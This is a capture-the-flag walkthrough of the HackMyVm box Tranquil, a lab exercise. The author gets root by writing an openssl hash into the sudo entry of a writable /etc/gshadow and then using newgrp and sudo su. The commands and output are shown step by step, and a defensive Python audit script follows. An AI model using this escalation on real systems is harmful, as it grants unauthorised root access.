HackMyVm Tranquil Walkthrough
https://hackmyvm.eu/machines/machine.php?vm=Tranquil
Key points: multiple services multiplexed on one port; writable /etc/gshadow.
A port scan shows only port 21 open, and it allows anonymous login, which is very strange.
nmap -sV -sC -p- -oN ports.log 192.168.56.100
Nmap scan report for deathnote.vuln (192.168.56.100)
Host is up (0.00076s latency).
Not shown: 65534 closed ports
PORT STATE SERVICE VERSION
21/tcp open ssh OpenSSH 8.4p1 Debian 5 (protocol 2.0)
|_ftp-bounce: ERROR: Script execution failed (use -d to debug)
| ssh-hostkey:
| 3072 0e:03:3b:78:00:29:1d:ba:60:86:0e:d3:bb:7e:3c:04 (RSA)
| 256 2a:47:4d:9c:ce:07:61:ca:f0:ca:58:8b:5b:0f:d4:db (ECDSA)
|_ 256 6c:42:50:a5:60:e9:0f:37:0f:be:ec:d1:20:74:29:9c (ED25519)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Check port 21 with curl.
~ curl http://192.168.56.100:21/ fish-0 | 0 [14:06:46]
<img src="tranquil.jpg">
<!-- We are one, humans, computers and ports.
- guru -->
Gobuster enumeration of files and folders found nothing.
Download tranquil.jpg; there is a strange colour-square encoding on its left side.
[image-20211012140828145.png]
Googling "color squares coding" leads to the Hexahue cipher; decode it at https://www.dcode.fr/hexahue-cipher and we get a string.
[image-20211012141217483.png]
Checking port 21 with nc shows that OpenSSH is running on it.
~ nc 192.168.56.100 21 fish-0 | 0 [14:14:14]
SSH-2.0-OpenSSH_8.4p1 Debian-5
123
Invalid SSH identification string.
Log in with the username guru and the password we decoded.
~ ssh guru@192.168.56.100 -p 21 fish-0 | 130 [14:12:56]
The authenticity of host '[192.168.56.100]:21 ([192.168.56.100]:21)' can't be established. ...
guru@tranquil:~$
Look for writable files.
guru@tranquil:~$ find / -writable -not -path "/proc*" 2>/dev/null
...
/etc/gshadow
...
Generate a password hash.
guru@tranquil:~$ openssl passwd mypass
//bd4FHJjr7kg
Put the password hash into the sudo group's password field in /etc/gshadow.
guru@tranquil:~$ cat /etc/gshadow
root:*:: ...
sudo://bd4FHJjr7kg::
...
Use newgrp to switch guru's group to sudo, entering the password we just set. Then check sudo again.
guru@tranquil:~$ newgrp sudo
Password:
guru@tranquil:~$ sudo -l
[sudo] password for guru:
Matching Defaults entries for guru on tranquil:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin
User guru may run the following commands on tranquil:
(ALL : ALL) ALL
Then we can become root.
guru@tranquil:~$ sudo su
root@tranquil:/home/guru# id;hostname
uid=0(root) gid=0(root) groups=0(root)
tranquil
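The whole privilege escalation rests on /etc/gshadow being writable and on a privileged group getting a usable password hash, which newgrp accepts from a non-member. Below is an added audit check (my own example, not from the walkthrough or from HackMyVm) that parses gshadow-format lines, flags privileged groups whose password field holds a real hash instead of a locked marker, and verifies the file mode. The sample content is constructed to mirror the sudo entry shown above; the privileged group list is an assumption.

```python
import os
import stat
from typing import Dict, List

# Constructed sample in /etc/gshadow format: name:password:admins:members.
# The "sudo" line mirrors the walkthrough: a usable crypt hash instead of "!" or "*".
SAMPLE_GSHADOW = """root:*::
daemon:*::
sudo://bd4FHJjr7kg::
guru:!::guru
"""

# Assumed list of groups whose membership grants privilege on a typical Debian host.
PRIVILEGED_GROUPS = {"root", "sudo", "wheel", "admin", "adm", "shadow", "docker"}


def parse_gshadow(text: str) -> List[Dict[str, str]]:
    """Split gshadow lines into their four fields; skip blank or malformed lines."""
    entries = []
    for line in text.splitlines():
        parts = line.split(":")
        if len(parts) != 4:
            continue
        entries.append({"name": parts[0], "password": parts[1],
                        "admins": parts[2], "members": parts[3]})
    return entries


def groups_with_usable_password(text: str) -> List[str]:
    """Privileged groups whose password field is a real hash.

    A field that is empty or starts with "!" or "*" is locked, so newgrp/sg
    cannot join the group with a password; anything else is a finding."""
    findings = []
    for e in parse_gshadow(text):
        pw = e["password"]
        if pw and not pw.startswith(("!", "*")) and e["name"] in PRIVILEGED_GROUPS:
            findings.append(e["name"])
    return findings


def mode_is_safe(mode: int) -> bool:
    """True when neither group nor others may write (expected 0640 root:shadow)."""
    return not (mode & (stat.S_IWGRP | stat.S_IWOTH))


def gshadow_mode_ok(path: str = "/etc/gshadow") -> bool:
    """Stat the real file and apply mode_is_safe; missing file counts as a failure."""
    try:
        return mode_is_safe(os.stat(path).st_mode)
    except FileNotFoundError:
        return False


if __name__ == "__main__":
    print("groups with usable password:", groups_with_usable_password(SAMPLE_GSHADOW))
```

On a live host, run it as root and feed `open("/etc/gshadow").read()` to `groups_with_usable_password`; a non-empty result or a failed `gshadow_mode_ok()` is the condition this box exploits.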